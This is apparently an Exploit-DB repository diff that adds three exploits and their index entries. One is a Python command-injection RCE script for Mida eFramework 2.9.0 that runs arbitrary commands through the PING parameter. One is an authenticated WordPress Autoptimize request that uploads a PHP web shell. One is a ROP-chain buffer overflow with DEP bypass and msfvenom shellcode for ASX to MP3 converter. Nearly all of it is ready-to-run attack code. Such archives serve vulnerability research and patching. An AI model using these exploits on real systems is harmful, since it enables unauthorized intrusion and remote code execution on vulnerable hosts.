DB: 2020-08-28

3 changes to exploits/shellcodes

ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)
Mida eFramework 2.9.0 - Remote Code Execution
Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)

exploits/multiple/webapps/48768.py

@@ -0,0 +1,72 @@
+# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
+# Google Dork: Server: Mida eFramework
+# Date: 2020-08-27
+# Exploit Author: elbae
+# Vendor Homepage: https://www.midasolutions.com/
+# Software Link: http://ova-efw.midasolutions.com/
+# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+# Version: <= 2.9.0
+# CVE : CVE-2020-15920
+
+
+#! /usr/bin/python3
+# -*- coding: utf-8 -*-
+
+import argparse
+import requests
+import subprocess
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def print_disclaimer():
+   print("""
+    ---------------------
+    Disclaimer:
+    1) For testing purpose only.
+    2) Do not attack production environments.
+    3) Intended for educational purposes only and cannot be used for law
+violation or personal gain.
+    4) The author is not responsible for any possible harm caused by this
+material.
+    ---------------------""")
+
+
+def print_info():
+   print("""
+[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
+[*] Reference:
+https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
+(RCE) in PDC/ajaxreq.php
+    Version\t< 2.9.0\t./CVE-2020-15920
+http://192.168.1.60:8090/PDC/ajaxreq.php id
+    Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
+id """)
+
+def pwn(url,cmd):
+   running = """
+[*] Target URL: {0}
+[*] Command: {1}
+   """
+   print(running.format(url,cmd))
+   data = {
+      "DIAGNOSIS":"PING",
+      "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
+   }
+   r = requests.post(url,data=data,verify=False)
+   line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
+   pretty_output = r.text.replace('<br>','\n')
+   print(line+"\n{0}\n".format(pretty_output)+line)
+
+def main():
+   print_info()
+   print_disclaimer()
+   parser = argparse.ArgumentParser()
+   parser.add_argument("target", type=str, help="the complete target URL")
+   parser.add_argument("cmd", type=str, help="the command you want to run")
+   args = parser.parse_args()
+   pwn(args.target, args.cmd)
+
+if __name__ == '__main__':
+   main()

exploits/php/webapps/48770.txt

@@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
+# Date: 2020-08-24
+# Software Link: https://wordpress.org/plugins/autoptimize/
+# Author : SunCSR Team
+# Version: v2.7.6
+# Tested on Ubuntu 18.04 / Kali Linux
+# Reference: https://wpvulndb.com/vulnerabilities/10372
+
+Description :
+-------------------------------------------------------------------
+
+The ao_ccss_import AJAX call does not ensure that the file provided is a
+legitimate Zip file, allowing high privilege users to upload arbitrary
+files, such as PHP, leading to RCE.
+
+[POC]
+
+Step 1 :
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: pwnme
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
+Firefox/80.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------26086940735210916964189813544
+Content-Length: 685
+Origin: http://pwnme
+Connection: close
+Cookie: autoptimize_feed=1;
+wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602;
+wp-settings-time-1=1598516614
+
+
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="file"; filename="shell.php"
+Content-Type: application/zip
+
+<?php Shell Content Here ! ?>
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="action"
+
+ao_ccss_import
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="ao_ccss_import_nonce"
+
+f25ca64f22
+-----------------------------404272946439029073744006559647--
+
+
+[Response]
+
+HTTP/1.1 200 OK
+Server: nginx/1.14.0 (Ubuntu)
+Date: Thu, 27 Aug 2020 08:21:08 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+Access-Control-Allow-Origin: http://pwnme.me
+Access-Control-Allow-Credentials: true
+X-Robots-Tag: noindex
+X-Content-Type-Options: nosniff
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+X-Frame-Options: SAMEORIGIN
+Referrer-Policy: strict-origin-when-cross-origin
+Content-Length: 53
+
+{"code":"200","msg":"Settings imported successfully"}
+
+
+Step 2: Access to
+http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php
+
+
+Recommendations: Update to version 2.7.7
+
+
+Thank you very much!

exploits/windows/local/48769.py

@@ -0,0 +1,133 @@
+# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) 
+# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-08-25
+# Vulnerable Software: ASX to MP3 converter
+# Version: 3.1.3.7.2010.11.05
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+# Proof of Concept :
+
+#   1.- Run python code: asx_to_mp3_rop_exploit.py
+#   2.- Works on DEP enabled for ASX2MP3Converter.exe
+#   3.- Open "ASX2MP3Converter.exe"
+#   4.- Click on "Load" Button 
+#   5.- Select generated file "asx_to_mp3_rop_exploit.wax".
+#   6.- Click on "Open".
+#   7.- Calc.exe runs.
+
+
+#################################################################################################################################################
+
+#Python "asx_to_mp3_rop_exploit.py" Code:
+
+import struct
+file = 'asx_to_mp3_rop_exploit.wax'
+
+
+payload = "http://"
+payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC"
+
+
+## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python
+
+buf =  ""
+buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33"
+buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05"
+buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70"
+buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e"
+buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8"
+buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99"
+buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7"
+buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a"
+buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27"
+buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26"
+buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a"
+buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3"
+buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0"
+buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d"
+buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf"
+buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96"
+buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa"
+
+
+
+## Save allocation type (0x1000) in EDX
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x11112112)
+payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
+payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
+payload += struct.pack('<L', 0xEEEEEEEE)
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x41414141)
+
+
+## Save the address of VirtualAlloc() in ESI
+payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN  
+payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() 
+payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN 
+payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
+payload += struct.pack('<L', 0x41414141)
+payload += struct.pack('<L', 0x41414141)
+
+
+## Save the size of the block in EBX
+payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
+
+
+
+## Save the address of esp in EBP
+payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
+payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
+
+
+
+##Save memory protection code (0x40) in ECX
+payload += struct.pack('<L',0x1002e16c)   # POP ECX # RETN   
+payload += struct.pack('<L',0xffffffff)
+payload += struct.pack('<L',0x10031ebe)   # INC ECX # AND EAX,8 # RETN  
+payload += struct.pack('<L',0x10031ebe)   # INC ECX # AND EAX,8 # RETN    
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7)   # ADD ECX,ECX # RETN
+
+
+## Save ROP-NOP in EDI
+payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
+payload += struct.pack('<L', 0x10010C8A) # RETN
+
+
+
+
+## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
+payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
+payload += struct.pack('<L', 0xA4E2F275)
+payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
+payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
+
+
+
+payload += "\x90" * 4
+payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
+payload += "\x90" * 20
+payload += buf
+
+
+
+f = open(file,'w')
+f.write(payload)
+f.close()

files_exploits.csv

@@ -11139,6 +11139,7 @@ id,file,description,date,author,type,platform,port
 48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
 48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
+48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43006,3 +43007,5 @@ id,file,description,date,author,type,platform,port
 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
 48765,exploits/multiple/webapps/48765.txt,"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery",2020-08-26,hyp3rlinx,webapps,multiple,
 48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
+48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,
+48770,exploits/php/webapps/48770.txt,"Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)",2020-08-27,"SunCSR Team",webapps,php,